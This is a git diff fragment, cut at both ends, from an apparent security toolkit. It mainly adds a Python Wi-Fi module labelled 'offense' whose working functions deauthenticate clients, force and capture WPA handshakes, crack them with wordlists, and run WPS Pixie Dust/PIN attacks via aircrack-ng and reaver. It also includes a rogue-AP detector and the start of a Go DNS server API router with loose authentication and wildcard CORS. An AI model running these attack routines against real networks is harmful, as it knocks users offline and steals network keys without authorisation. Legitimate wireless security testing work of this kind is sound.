print(f"\n Crawled {r.get('pages_crawled', 0)} pages:") + for page in r.get('pages', []): + print(f" [{page['status']}] {page['url']}" + f" ({page['size']} bytes, {page['forms']} forms)") diff --git a/modules/wifi_audit.py b/modules/wifi_audit.py new file mode 100644 index 0000000..f82e5fa --- /dev/null +++ b/modules/wifi_audit.py @@ -0,0 +1,843 @@ +"""AUTARCH WiFi Auditing + +Interface management, network discovery, handshake capture, deauth attack, +rogue AP detection, WPS attack, and packet capture for wireless security auditing. +""" + +DESCRIPTION = "WiFi network auditing & attack tools" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import re +import json +import time +import signal +import shutil +import threading +import subprocess +from pathlib import Path +from dataclasses import dataclass, field +from typing import Dict, List, Optional, Any, Tuple + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── Data Structures ────────────────────────────────────────────────────────── + +@dataclass +class AccessPoint: + bssid: str + ssid: str = "" + channel: int = 0 + encryption: str = "" + cipher: str = "" + auth: str = "" + signal: int = 0 + beacons: int = 0 + data_frames: int = 0 + clients: List[str] = field(default_factory=list) + +@dataclass +class WifiClient: + mac: str + bssid: str = "" + signal: int = 0 + frames: int = 0 + probe: str = "" + + +# ── WiFi Auditor ───────────────────────────────────────────────────────────── + +class WiFiAuditor: + """WiFi auditing toolkit using aircrack-ng suite.""" + + def __init__(self): + self.data_dir = os.path.join(get_data_dir(), 'wifi') + os.makedirs(self.data_dir, exist_ok=True) + self.captures_dir = os.path.join(self.data_dir, 'captures') + os.makedirs(self.captures_dir, exist_ok=True) + + # Tool paths + self.airmon = find_tool('airmon-ng') or shutil.which('airmon-ng') + self.airodump = find_tool('airodump-ng') or shutil.which('airodump-ng') + self.aireplay = find_tool('aireplay-ng') or shutil.which('aireplay-ng') + self.aircrack = find_tool('aircrack-ng') or shutil.which('aircrack-ng') + self.reaver = find_tool('reaver') or shutil.which('reaver') + self.wash = find_tool('wash') or shutil.which('wash') + self.iwconfig = shutil.which('iwconfig') + self.iw = shutil.which('iw') + self.ip_cmd = shutil.which('ip') + + # State + self.monitor_interface: Optional[str] = None + self.scan_results: Dict[str, AccessPoint] = {} + self.clients: List[WifiClient] = [] + self.known_aps: List[Dict] = [] + self._scan_proc: Optional[subprocess.Popen] = None + self._capture_proc: Optional[subprocess.Popen] = None + self._jobs: Dict[str, Dict] = {} + + def get_tools_status(self) -> Dict[str, bool]: + """Check availability of all required tools.""" + return { + 'airmon-ng': self.airmon is not None, + 'airodump-ng': self.airodump is not None, + 'aireplay-ng': self.aireplay is not None, + 'aircrack-ng': self.aircrack is not None, + 'reaver': self.reaver is not None, + 'wash': self.wash is not None, + 'iwconfig': self.iwconfig is not None, + 'iw': self.iw is not None, + 'ip': self.ip_cmd is not None, + } + + # ── Interface Management ───────────────────────────────────────────── + + def get_interfaces(self) -> List[Dict]: + """List wireless interfaces.""" + interfaces = [] + # Try iw first + if self.iw: + try: + out = subprocess.check_output([self.iw, 'dev'], text=True, timeout=5) + iface = None + for line in out.splitlines(): + line = line.strip() + if line.startswith('Interface'): + iface = {'name': line.split()[-1], 'mode': 'managed', 'channel': 0, 'mac': ''} + elif iface: + if line.startswith('type'): + iface['mode'] = line.split()[-1] + elif line.startswith('channel'): + try: + iface['channel'] = int(line.split()[1]) + except (ValueError, IndexError): + pass + elif line.startswith('addr'): + iface['mac'] = line.split()[-1] + if iface: + interfaces.append(iface) + except Exception: + pass + + # Fallback to iwconfig + if not interfaces and self.iwconfig: + try: + out = subprocess.check_output([self.iwconfig], text=True, + stderr=subprocess.DEVNULL, timeout=5) + for block in out.split('\n\n'): + if 'IEEE 802.11' in block or 'ESSID' in block: + name = block.split()[0] + mode = 'managed' + if 'Mode:Monitor' in block: + mode = 'monitor' + elif 'Mode:Master' in block: + mode = 'master' + freq_m = re.search(r'Channel[:\s]*(\d+)', block) + ch = int(freq_m.group(1)) if freq_m else 0 + interfaces.append({'name': name, 'mode': mode, 'channel': ch, 'mac': ''}) + except Exception: + pass + + # Fallback: list from /sys + if not interfaces: + try: + wireless_dir = Path('/sys/class/net') + if wireless_dir.exists(): + for d in wireless_dir.iterdir(): + if (d / 'wireless').exists() or (d / 'phy80211').exists(): + interfaces.append({ + 'name': d.name, 'mode': 'unknown', 'channel': 0, 'mac': '' + }) + except Exception: + pass + + return interfaces + + def enable_monitor(self, interface: str) -> Dict: + """Put interface into monitor mode.""" + if not self.airmon: + return {'ok': False, 'error': 'airmon-ng not found'} + + try: + # Kill interfering processes + subprocess.run([self.airmon, 'check', 'kill'], + capture_output=True, text=True, timeout=10) + + # Enable monitor mode + result = subprocess.run([self.airmon, 'start', interface], + capture_output=True, text=True, timeout=10) + + # Detect monitor interface name (usually wlan0mon or similar) + mon_iface = interface + 'mon' + for line in result.stdout.splitlines(): + m = re.search(r'\(monitor mode.*enabled.*on\s+(\S+)\)', line, re.I) + if m: + mon_iface = m.group(1) + break + m = re.search(r'monitor mode.*vif.*enabled.*for.*\[(\S+)\]', line, re.I) + if m: + mon_iface = m.group(1) + break + + self.monitor_interface = mon_iface + return {'ok': True, 'interface': mon_iface, 'message': f'Monitor mode enabled on {mon_iface}'} + + except subprocess.TimeoutExpired: + return {'ok': False, 'error': 'Timeout enabling monitor mode'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + def disable_monitor(self, interface: str = None) -> Dict: + """Disable monitor mode and restore managed mode.""" + if not self.airmon: + return {'ok': False, 'error': 'airmon-ng not found'} + + iface = interface or self.monitor_interface + if not iface: + return {'ok': False, 'error': 'No monitor interface specified'} + + try: + result = subprocess.run([self.airmon, 'stop', iface], + capture_output=True, text=True, timeout=10) + self.monitor_interface = None + # Restart network manager + subprocess.run(['systemctl', 'start', 'NetworkManager'], + capture_output=True, timeout=5) + return {'ok': True, 'message': f'Monitor mode disabled on {iface}'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + def set_channel(self, interface: str, channel: int) -> Dict: + """Set wireless interface channel.""" + if self.iw: + try: + subprocess.run([self.iw, 'dev', interface, 'set', 'channel', str(channel)], + capture_output=True, text=True, timeout=5) + return {'ok': True, 'channel': channel} + except Exception as e: + return {'ok': False, 'error': str(e)} + return {'ok': False, 'error': 'iw not found'} + + # ── Network Scanning ───────────────────────────────────────────────── + + def scan_networks(self, interface: str = None, duration: int = 15) -> Dict: + """Scan for nearby wireless networks using airodump-ng.""" + iface = interface or self.monitor_interface + if not iface: + return {'ok': False, 'error': 'No monitor interface. Enable monitor mode first.'} + if not self.airodump: + return {'ok': False, 'error': 'airodump-ng not found'} + + prefix = os.path.join(self.captures_dir, f'scan_{int(time.time())}') + + try: + proc = subprocess.Popen( + [self.airodump, '--output-format', 'csv', '-w', prefix, iface], + stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL + ) + time.sleep(duration) + proc.send_signal(signal.SIGINT) + proc.wait(timeout=5) + + # Parse CSV output + csv_file = prefix + '-01.csv' + if os.path.exists(csv_file): + self._parse_airodump_csv(csv_file) + return { + 'ok': True, + 'access_points': [self._ap_to_dict(ap) for ap in self.scan_results.values()], + 'clients': [self._client_to_dict(c) for c in self.clients], + 'count': len(self.scan_results) + } + return {'ok': False, 'error': 'No scan output produced'} + + except Exception as e: + return {'ok': False, 'error': str(e)} + + def _parse_airodump_csv(self, filepath: str): + """Parse airodump-ng CSV output.""" + self.scan_results.clear() + self.clients.clear() + + try: + with open(filepath, 'r', errors='ignore') as f: + content = f.read() + + # Split into AP section and client section + sections = content.split('Station MAC') + ap_section = sections[0] if sections else '' + client_section = sections[1] if len(sections) > 1 else '' + + # Parse APs + for line in ap_section.splitlines(): + parts = [p.strip() for p in line.split(',')] + if len(parts) >= 14 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]): + bssid = parts[0].upper() + ap = AccessPoint( + bssid=bssid, + channel=int(parts[3]) if parts[3].strip().isdigit() else 0, + signal=int(parts[8]) if parts[8].strip().lstrip('-').isdigit() else 0, + encryption=parts[5].strip(), + cipher=parts[6].strip(), + auth=parts[7].strip(), + beacons=int(parts[9]) if parts[9].strip().isdigit() else 0, + data_frames=int(parts[10]) if parts[10].strip().isdigit() else 0, + ssid=parts[13].strip() if len(parts) > 13 else '' + ) + self.scan_results[bssid] = ap + + # Parse clients + for line in client_section.splitlines(): + parts = [p.strip() for p in line.split(',')] + if len(parts) >= 6 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]): + client = WifiClient( + mac=parts[0].upper(), + signal=int(parts[3]) if parts[3].strip().lstrip('-').isdigit() else 0, + frames=int(parts[4]) if parts[4].strip().isdigit() else 0, + bssid=parts[5].strip().upper() if len(parts) > 5 else '', + probe=parts[6].strip() if len(parts) > 6 else '' + ) + self.clients.append(client) + # Associate with AP + if client.bssid in self.scan_results: + self.scan_results[client.bssid].clients.append(client.mac) + + except Exception: + pass + + def get_scan_results(self) -> Dict: + """Return current scan results.""" + return { + 'access_points': [self._ap_to_dict(ap) for ap in self.scan_results.values()], + 'clients': [self._client_to_dict(c) for c in self.clients], + 'count': len(self.scan_results) + } + + # ── Handshake Capture ──────────────────────────────────────────────── + + def capture_handshake(self, interface: str, bssid: str, channel: int, + deauth_count: int = 5, timeout: int = 60) -> str: + """Capture WPA handshake. Returns job_id for async polling.""" + job_id = f'handshake_{int(time.time())}' + self._jobs[job_id] = { + 'type': 'handshake', 'status': 'running', 'bssid': bssid, + 'result': None, 'started': time.time() + } + + def _capture(): + try: + # Set channel + self.set_channel(interface, channel) + + prefix = os.path.join(self.captures_dir, f'hs_{bssid.replace(":", "")}_{int(time.time())}') + + # Start capture + cap_proc = subprocess.Popen( + [self.airodump, '-c', str(channel), '--bssid', bssid, + '-w', prefix, interface], + stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL + ) + + # Send deauths after short delay + time.sleep(3) + if self.aireplay: + subprocess.run( + [self.aireplay, '-0', str(deauth_count), '-a', bssid, interface], + capture_output=True, timeout=15 + ) + + # Wait for handshake + cap_file = prefix + '-01.cap' + start = time.time() + captured = False + while time.time() - start < timeout: + if os.path.exists(cap_file) and self.aircrack: + check = subprocess.run( + [self.aircrack, '-a', '2', '-b', bssid, cap_file], + capture_output=True, text=True, timeout=10 + ) + if '1 handshake' in check.stdout.lower() or 'valid handshake' in check.stdout.lower(): + captured = True + break + time.sleep(2) + + cap_proc.send_signal(signal.SIGINT) + cap_proc.wait(timeout=5) + + if captured: + self._jobs[job_id]['status'] = 'complete' + self._jobs[job_id]['result'] = { + 'ok': True, 'capture_file': cap_file, 'bssid': bssid, + 'message': f'Handshake captured for {bssid}' + } + else: + self._jobs[job_id]['status'] = 'complete' + self._jobs[job_id]['result'] = { + 'ok': False, 'error': 'Handshake capture timed out', + 'capture_file': cap_file if os.path.exists(cap_file) else None + } + + except Exception as e: + self._jobs[job_id]['status'] = 'error' + self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)} + + threading.Thread(target=_capture, daemon=True).start() + return job_id + + def crack_handshake(self, capture_file: str, wordlist: str, bssid: str = None) -> str: + """Crack captured handshake with wordlist. Returns job_id.""" + if not self.aircrack: + return '' + + job_id = f'crack_{int(time.time())}' + self._jobs[job_id] = { + 'type': 'crack', 'status': 'running', + 'result': None, 'started': time.time() + } + + def _crack(): + try: + cmd = [self.aircrack, '-w', wordlist, '-b', bssid, capture_file] if bssid else \ + [self.aircrack, '-w', wordlist, capture_file] + + result = subprocess.run(cmd, capture_output=True, text=True, timeout=3600) + + # Parse result + key_match = re.search(r'KEY FOUND!\s*\[\s*(.+?)\s*\]', result.stdout) + if key_match: + self._jobs[job_id]['status'] = 'complete' + self._jobs[job_id]['result'] = { + 'ok': True, 'key': key_match.group(1), 'message': 'Key found!' + } + else: + self._jobs[job_id]['status'] = 'complete' + self._jobs[job_id]['result'] = { + 'ok': False, 'error': 'Key not found in wordlist' + } + + except subprocess.TimeoutExpired: + self._jobs[job_id]['status'] = 'error' + self._jobs[job_id]['result'] = {'ok': False, 'error': 'Crack timeout (1hr)'} + except Exception as e: + self._jobs[job_id]['status'] = 'error' + self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)} + + threading.Thread(target=_crack, daemon=True).start() + return job_id + + # ── Deauth Attack ──────────────────────────────────────────────────── + + def deauth(self, interface: str, bssid: str, client: str = None, + count: int = 10) -> Dict: + """Send deauthentication frames.""" + if not self.aireplay: + return {'ok': False, 'error': 'aireplay-ng not found'} + + iface = interface or self.monitor_interface + if not iface: + return {'ok': False, 'error': 'No monitor interface'} + + try: + cmd = [self.aireplay, '-0', str(count), '-a', bssid] + if client: + cmd += ['-c', client] + cmd.append(iface) + + result = subprocess.run(cmd, capture_output=True, text=True, timeout=30) + return { + 'ok': True, + 'message': f'Sent {count} deauth frames to {bssid}' + + (f' targeting {client}' if client else ' (broadcast)'), + 'output': result.stdout + } + except subprocess.TimeoutExpired: + return {'ok': False, 'error': 'Deauth timeout'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + # ── Rogue AP Detection ─────────────────────────────────────────────── + + def save_known_aps(self): + """Save current scan as known/baseline APs.""" + self.known_aps = [self._ap_to_dict(ap) for ap in self.scan_results.values()] + known_file = os.path.join(self.data_dir, 'known_aps.json') + with open(known_file, 'w') as f: + json.dump(self.known_aps, f, indent=2) + return {'ok': True, 'count': len(self.known_aps)} + + def load_known_aps(self) -> List[Dict]: + """Load previously saved known APs.""" + known_file = os.path.join(self.data_dir, 'known_aps.json') + if os.path.exists(known_file): + with open(known_file) as f: + self.known_aps = json.load(f) + return self.known_aps + + def detect_rogue_aps(self) -> Dict: + """Compare current scan against known APs to detect evil twins/rogues.""" + if not self.known_aps: + self.load_known_aps() + if not self.known_aps: + return {'ok': False, 'error': 'No baseline APs saved. Run save_known_aps first.'} + + known_bssids = {ap['bssid'] for ap in self.known_aps} + known_ssids = {ap['ssid'] for ap in self.known_aps if ap['ssid']} + known_pairs = {(ap['bssid'], ap['ssid']) for ap in self.known_aps} + + alerts = [] + for bssid, ap in self.scan_results.items(): + if bssid not in known_bssids: + if ap.ssid in known_ssids: + # Same SSID, different BSSID = possible evil twin + alerts.append({ + 'type': 'evil_twin', + 'severity': 'high', + 'bssid': bssid, + 'ssid': ap.ssid, + 'channel': ap.channel, + 'signal': ap.signal, + 'message': f'Possible evil twin: SSID "{ap.ssid}" from unknown BSSID {bssid}' + }) + else: + # Completely new AP + alerts.append({ + 'type': 'new_ap', + 'severity': 'low', + 'bssid': bssid, + 'ssid': ap.ssid, + 'channel': ap.channel, + 'signal': ap.signal, + 'message': f'New AP detected: "{ap.ssid}" ({bssid})' + }) + else: + # Known BSSID but check for SSID change + if (bssid, ap.ssid) not in known_pairs and ap.ssid: + alerts.append({ + 'type': 'ssid_change', + 'severity': 'medium', + 'bssid': bssid, + 'ssid': ap.ssid, + 'message': f'Known AP {bssid} changed SSID to "{ap.ssid}"' + }) + + return { + 'ok': True, + 'alerts': alerts, + 'alert_count': len(alerts), + 'scanned': len(self.scan_results), + 'known': len(self.known_aps) + } + + # ── WPS Attack ─────────────────────────────────────────────────────── + + def wps_scan(self, interface: str = None) -> Dict: + """Scan for WPS-enabled networks using wash.""" + iface = interface or self.monitor_interface + if not self.wash: + return {'ok': False, 'error': 'wash not found'} + if not iface: + return {'ok': False, 'error': 'No monitor interface'} + + try: + result = subprocess.run( + [self.wash, '-i', iface, '-s'], + capture_output=True, text=True, timeout=15 + ) + networks = [] + for line in result.stdout.splitlines(): + parts = line.split() + if len(parts) >= 6 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]): + networks.append({ + 'bssid': parts[0], + 'channel': parts[1], + 'rssi': parts[2], + 'wps_version': parts[3], + 'locked': parts[4].upper() == 'YES', + 'ssid': ' '.join(parts[5:]) + }) + return {'ok': True, 'networks': networks, 'count': len(networks)} + except Exception as e: + return {'ok': False, 'error': str(e)} + + def wps_attack(self, interface: str, bssid: str, channel: int, + pixie_dust: bool = True, timeout: int = 300) -> str: + """Run WPS PIN attack (Pixie Dust or brute force). Returns job_id.""" + if not self.reaver: + return '' + + job_id = f'wps_{int(time.time())}' + self._jobs[job_id] = { + 'type': 'wps', 'status': 'running', 'bssid': bssid, + 'result': None, 'started': time.time() + } + + def _attack(): + try: + cmd = [self.reaver, '-i', interface, '-b', bssid, '-c', str(channel), '-vv'] + if pixie_dust: + cmd.extend(['-K', '1']) + + result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout) + + pin_match = re.search(r'WPS PIN:\s*[\'"]?(\d+)', result.stdout) + psk_match = re.search(r'WPA PSK:\s*[\'"]?(.+?)[\'"]?\s*$', result.stdout, re.M) + + if pin_match or psk_match: + self._jobs[job_id]['status'] = 'complete' + self._jobs[job_id]['result'] = { + 'ok': True, + 'pin': pin_match.group(1) if pin_match else None, + 'psk': psk_match.group(1) if psk_match else None, + 'message': 'WPS attack successful' + } + else: + self._jobs[job_id]['status'] = 'complete' + self._jobs[job_id]['result'] = { + 'ok': False, 'error': 'WPS attack failed', + 'output': result.stdout[-500:] if result.stdout else '' + } + except subprocess.TimeoutExpired: + self._jobs[job_id]['status'] = 'error' + self._jobs[job_id]['result'] = {'ok': False, 'error': 'WPS attack timed out'} + except Exception as e: + self._jobs[job_id]['status'] = 'error' + self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)} + + threading.Thread(target=_attack, daemon=True).start() + return job_id + + # ── Packet Capture ─────────────────────────────────────────────────── + + def start_capture(self, interface: str, channel: int = None, + bssid: str = None, output_name: str = None) -> Dict: + """Start raw packet capture on interface.""" + if not self.airodump: + return {'ok': False, 'error': 'airodump-ng not found'} + + iface = interface or self.monitor_interface + if not iface: + return {'ok': False, 'error': 'No monitor interface'} + + name = output_name or f'capture_{int(time.time())}' + prefix = os.path.join(self.captures_dir, name) + + cmd = [self.airodump, '--output-format', 'pcap,csv', '-w', prefix] + if channel: + cmd += ['-c', str(channel)] + if bssid: + cmd += ['--bssid', bssid] + cmd.append(iface) + + try: + self._capture_proc = subprocess.Popen( + cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL + ) + return { + 'ok': True, + 'message': f'Capture started on {iface}', + 'prefix': prefix, + 'pid': self._capture_proc.pid + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + def stop_capture(self) -> Dict: + """Stop running packet capture.""" + if self._capture_proc: + try: + self._capture_proc.send_signal(signal.SIGINT) + self._capture_proc.wait(timeout=5) + except Exception: + self._capture_proc.kill() + self._capture_proc = None + return {'ok': True, 'message': 'Capture stopped'} + return {'ok': False, 'error': 'No capture running'} + + def list_captures(self) -> List[Dict]: + """List saved capture files.""" + captures = [] + cap_dir = Path(self.captures_dir) + for f in sorted(cap_dir.glob('*.cap')) + sorted(cap_dir.glob('*.pcap')): + captures.append({ + 'name': f.name, + 'path': str(f), + 'size': f.stat().st_size, + 'modified': f.stat().st_mtime + }) + return captures + + # ── Job Management ─────────────────────────────────────────────────── + + def get_job(self, job_id: str) -> Optional[Dict]: + """Get job status.""" + return self._jobs.get(job_id) + + def list_jobs(self) -> List[Dict]: + """List all jobs.""" + return [{'id': k, **v} for k, v in self._jobs.items()] + + # ── Helpers ────────────────────────────────────────────────────────── + + def _ap_to_dict(self, ap: AccessPoint) -> Dict: + return { + 'bssid': ap.bssid, 'ssid': ap.ssid, 'channel': ap.channel, + 'encryption': ap.encryption, 'cipher': ap.cipher, 'auth': ap.auth, + 'signal': ap.signal, 'beacons': ap.beacons, + 'data_frames': ap.data_frames, 'clients': ap.clients + } + + def _client_to_dict(self, c: WifiClient) -> Dict: + return { + 'mac': c.mac, 'bssid': c.bssid, 'signal': c.signal, + 'frames': c.frames, 'probe': c.probe + } + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_wifi_auditor() -> WiFiAuditor: + global _instance + if _instance is None: + _instance = WiFiAuditor() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for WiFi Auditing module.""" + auditor = get_wifi_auditor() + + while True: + tools = auditor.get_tools_status() + available = sum(1 for v in tools.values() if v) + + print(f"\n{'='*60}") + print(f" WiFi Auditing ({available}/{len(tools)} tools available)") + print(f"{'='*60}") + print(f" Monitor Interface: {auditor.monitor_interface or 'None'}") + print(f" APs Found: {len(auditor.scan_results)}") + print(f" Clients Found: {len(auditor.clients)}") + print() + print(" 1 — List Wireless Interfaces") + print(" 2 — Enable Monitor Mode") + print(" 3 — Disable Monitor Mode") + print(" 4 — Scan Networks") + print(" 5 — Deauth Attack") + print(" 6 — Capture Handshake") + print(" 7 — Crack Handshake") + print(" 8 — WPS Scan") + print(" 9 — Rogue AP Detection") + print(" 10 — Packet Capture") + print(" 11 — Tool Status") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + elif choice == '1': + ifaces = auditor.get_interfaces() + if ifaces: + for i in ifaces: + print(f" {i['name']} mode={i['mode']} ch={i['channel']}") + else: + print(" No wireless interfaces found") + elif choice == '2': + iface = input(" Interface name: ").strip() + result = auditor.enable_monitor(iface) + print(f" {result.get('message', result.get('error', 'Unknown'))}") + elif choice == '3': + result = auditor.disable_monitor() + print(f" {result.get('message', result.get('error', 'Unknown'))}") + elif choice == '4': + dur = input(" Scan duration (seconds, default 15): ").strip() + result = auditor.scan_networks(duration=int(dur) if dur.isdigit() else 15) + if result['ok']: + print(f" Found {result['count']} access points:") + for ap in result['access_points']: + print(f" {ap['bssid']} {ap['ssid']:<24} ch={ap['channel']} " + f"sig={ap['signal']}dBm {ap['encryption']}") + else: + print(f" Error: {result['error']}") + elif choice == '5': + bssid = input(" Target BSSID: ").strip() + client = input(" Client MAC (blank=broadcast): ").strip() or None + count = input(" Deauth count (default 10): ").strip() + result = auditor.deauth(auditor.monitor_interface, bssid, client, + int(count) if count.isdigit() else 10) + print(f" {result.get('message', result.get('error'))}") + elif choice == '6': + bssid = input(" Target BSSID: ").strip() + channel = input(" Channel: ").strip() + if bssid and channel.isdigit(): + job_id = auditor.capture_handshake(auditor.monitor_interface, bssid, int(channel)) + print(f" Handshake capture started (job: {job_id})") + print(" Polling for result...") + while True: + job = auditor.get_job(job_id) + if job and job['status'] != 'running': + print(f" Result: {job['result']}") + break + time.sleep(3) + elif choice == '7': + cap = input(" Capture file path: ").strip() + wl = input(" Wordlist path: ").strip() + bssid = input(" BSSID (optional): ").strip() or None + if cap and wl: + job_id = auditor.crack_handshake(cap, wl, bssid) + if job_id: + print(f" Cracking started (job: {job_id})") + else: + print(" aircrack-ng not found") + elif choice == '8': + result = auditor.wps_scan() + if result['ok']: + print(f" Found {result['count']} WPS networks:") + for n in result['networks']: + locked = 'LOCKED' if n['locked'] else 'open' + print(f" {n['bssid']} {n['ssid']:<24} WPS {n['wps_version']} {locked}") + else: + print(f" Error: {result['error']}") + elif choice == '9': + if not auditor.known_aps: + print(" No baseline saved. Save current scan as baseline? (y/n)") + if input(" > ").strip().lower() == 'y': + auditor.save_known_aps() + print(f" Saved {len(auditor.known_aps)} APs as baseline") + else: + result = auditor.detect_rogue_aps() + if result['ok']: + print(f" Scanned: {result['scanned']} Known: {result['known']} Alerts: {result['alert_count']}") + for a in result['alerts']: + print(f" [{a['severity'].upper()}] {a['message']}") + elif choice == '10': + print(" 1 — Start Capture") + print(" 2 — Stop Capture") + print(" 3 — List Captures") + sub = input(" > ").strip() + if sub == '1': + result = auditor.start_capture(auditor.monitor_interface) + print(f" {result.get('message', result.get('error'))}") + elif sub == '2': + result = auditor.stop_capture() + print(f" {result.get('message', result.get('error'))}") + elif sub == '3': + for c in auditor.list_captures(): + print(f" {c['name']} ({c['size']} bytes)") + elif choice == '11': + for tool, avail in tools.items(): + status = 'OK' if avail else 'MISSING' + print(f" {tool:<15} {status}") diff --git a/services/dns-server/api/router.go b/services/dns-server/api/router.go new file mode 100644 index 0000000..da07ca4 --- /dev/null +++ b/services/dns-server/api/router.go @@ -0,0 +1,1081 @@ +package api + +import ( + "encoding/json" + "fmt" + "log" + "net/http" + "sort" + "strconv" + "strings" + "time" + + "github.com/darkhal/autarch-dns/config" + "github.com/darkhal/autarch-dns/server" + "github.com/miekg/dns" +) + +// APIServer exposes REST endpoints for zone/record management. +type APIServer struct { + cfg *config.Config + store *server.ZoneStore + dns *server.DNSServer +} + +// NewAPIServer creates an API server. +func NewAPIServer(cfg *config.Config, store *server.ZoneStore, dns *server.DNSServer) *APIServer { + return &APIServer{cfg: cfg, store: store, dns: dns} +} + +// Start begins the HTTP API server. +func (a *APIServer) Start() error { + mux := http.NewServeMux() + + // Status & metrics + mux.HandleFunc("/api/status", a.auth(a.handleStatus)) + mux.HandleFunc("/api/metrics", a.auth(a.handleMetrics)) + mux.HandleFunc("/api/config", a.auth(a.handleConfig)) + + // Zones + mux.HandleFunc("/api/zones", a.auth(a.handleZones)) + mux.HandleFunc("/api/zones/", a.auth(a.handleZoneDetail)) + + // Query log + mux.HandleFunc("/api/querylog", a.auth(a.handleQueryLog)) + + // Cache + mux.HandleFunc("/api/cache", a.auth(a.handleCache)) + + // Blocklist + mux.HandleFunc("/api/blocklist", a.auth(a.handleBlocklist)) + + // Analytics + mux.HandleFunc("/api/stats/top-domains", a.auth(a.handleTopDomains)) + mux.HandleFunc("/api/stats/query-types", a.auth(a.handleQueryTypes)) + mux.HandleFunc("/api/stats/clients", a.auth(a.handleClients)) + + // Resolver internals + mux.HandleFunc("/api/resolver/ns-cache", a.auth(a.handleNSCache)) + + // Root server health + mux.HandleFunc("/api/rootcheck", a.auth(a.handleRootCheck)) + + // Benchmark + mux.HandleFunc("/api/benchmark", a.auth(a.handleBenchmark)) + + // Conditional forwarding + mux.HandleFunc("/api/forwarding", a.auth(a.handleForwarding)) + + // Zone import/export + mux.HandleFunc("/api/zone-export/", a.auth(a.handleZoneExport)) + mux.HandleFunc("/api/zone-import/", a.auth(a.handleZoneImport)) + mux.HandleFunc("/api/zone-clone", a.auth(a.handleZoneClone)) + mux.HandleFunc("/api/zone-bulk-records/", a.auth(a.handleBulkRecords)) + + // Hosts file management + mux.HandleFunc("/api/hosts", a.auth(a.handleHosts)) + mux.HandleFunc("/api/hosts/import", a.auth(a.handleHostsImport)) + mux.HandleFunc("/api/hosts/export", a.auth(a.handleHostsExport)) + + // Encryption (DoT/DoH) + mux.HandleFunc("/api/encryption", a.auth(a.handleEncryption)) + mux.HandleFunc("/api/encryption/test", a.auth(a.handleEncryptionTest)) + + return http.ListenAndServe(a.cfg.ListenAPI, a.corsMiddleware(mux)) +} + +// ── Middleware ──────────────────────────────────────────────────────── + +func (a *APIServer) auth(next http.HandlerFunc) http.HandlerFunc { + return func(w http.ResponseWriter, r *http.Request) { + token := r.Header.Get("Authorization") + if token == "" { + token = r.URL.Query().Get("token") + } + token = strings.TrimPrefix(token, "Bearer ") + + if a.cfg.APIToken != "" && token != a.cfg.APIToken { + jsonError(w, "unauthorized", http.StatusUnauthorized) + return + } + next(w, r) + } +} + +func (a *APIServer) corsMiddleware(next http.Handler) http.Handler { + return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Access-Control-Allow-Origin", "*") + w.Header().Set("Access-Control-Allow-Methods", "GET, POST, PUT, DELETE, OPTIONS") + w.Header().Set("Access-Control-Allow-Headers", "Authorization, Content-Type") + if r.Method == "OPTIONS" { + w.WriteHeader(http.StatusOK) + return + } + next.ServeHTTP(w, r) + }) +} + +// ── Status & Metrics ───────────────────────────────────────────────── + +func (a *APIServer) handleStatus(w http.ResponseWriter, r *http.Request) { + m := a.dns.GetMetrics() + jsonResp(w, map[string]interface{}{ + "ok": true, + "version": "2.1.0", + "uptime": time.Since(parseTime(m.StartTime)).String(), + "queries": m.TotalQueries, + "zones": len(a.store.List()), + "cache_size": a.dns.CacheSize(), + }) +} + +func (a *APIServer) handleMetrics(w http.ResponseWriter, r *http.Request) { + m := a.dns.GetMetrics() + jsonResp(w, map[string]interface{}{ + "ok": true, + "metrics": m, + "cache_size": a.dns.CacheSize(), + "uptime": time.Since(parseTime(m.StartTime)).String(), + }) +} + +// ── Config ─────────────────────────────────────────────────────────── + +func (a *APIServer) handleConfig(w http.ResponseWriter, r *http.Request) { + if r.Method == "PUT" { + var updates config.Config + if err := json.NewDecoder(r.Body).Decode(&updates); err != nil { + jsonError(w, "invalid JSON", http.StatusBadRequest) + return + } + // Apply upstream — allow clearing to empty + a.cfg.Upstream = updates.Upstream + if updates.CacheTTL > 0 { + a.cfg.CacheTTL = updates.CacheTTL + } + if updates.RateLimit >= 0 { + a.cfg.RateLimit = updates.RateLimit + } + if updates.MaxUDPSize > 0 { + a.cfg.MaxUDPSize = updates.MaxUDPSize + } + a.cfg.LogQueries = updates.LogQueries + a.cfg.RefuseANY = updates.RefuseANY + a.cfg.MinimalResponses = updates.MinimalResponses + a.cfg.EnableDoH = updates.EnableDoH + a.cfg.EnableDoT = updates.EnableDoT + a.cfg.AllowTransfer = updates.AllowTransfer + a.cfg.HostsFile = updates.HostsFile + a.cfg.HostsAutoLoad = updates.HostsAutoLoad + if updates.QueryLogMax > 0 { + a.cfg.QueryLogMax = updates.QueryLogMax + } + if updates.NegativeCacheTTL >= 0 { + a.cfg.NegativeCacheTTL = updates.NegativeCacheTTL + } + if updates.ServFailCacheTTL >= 0 { + a.cfg.ServFailCacheTTL = updates.ServFailCacheTTL + } + a.cfg.PrefetchEnabled = updates.PrefetchEnabled + + // Propagate encryption settings to resolver + a.dns.SetEncryption(a.cfg.EnableDoT, a.cfg.EnableDoH) + + jsonResp(w, map[string]interface{}{"ok": true}) + return + } + jsonResp(w, map[string]interface{}{ + "ok": true, + "config": map[string]interface{}{ + "listen_dns": a.cfg.ListenDNS, + "listen_api": 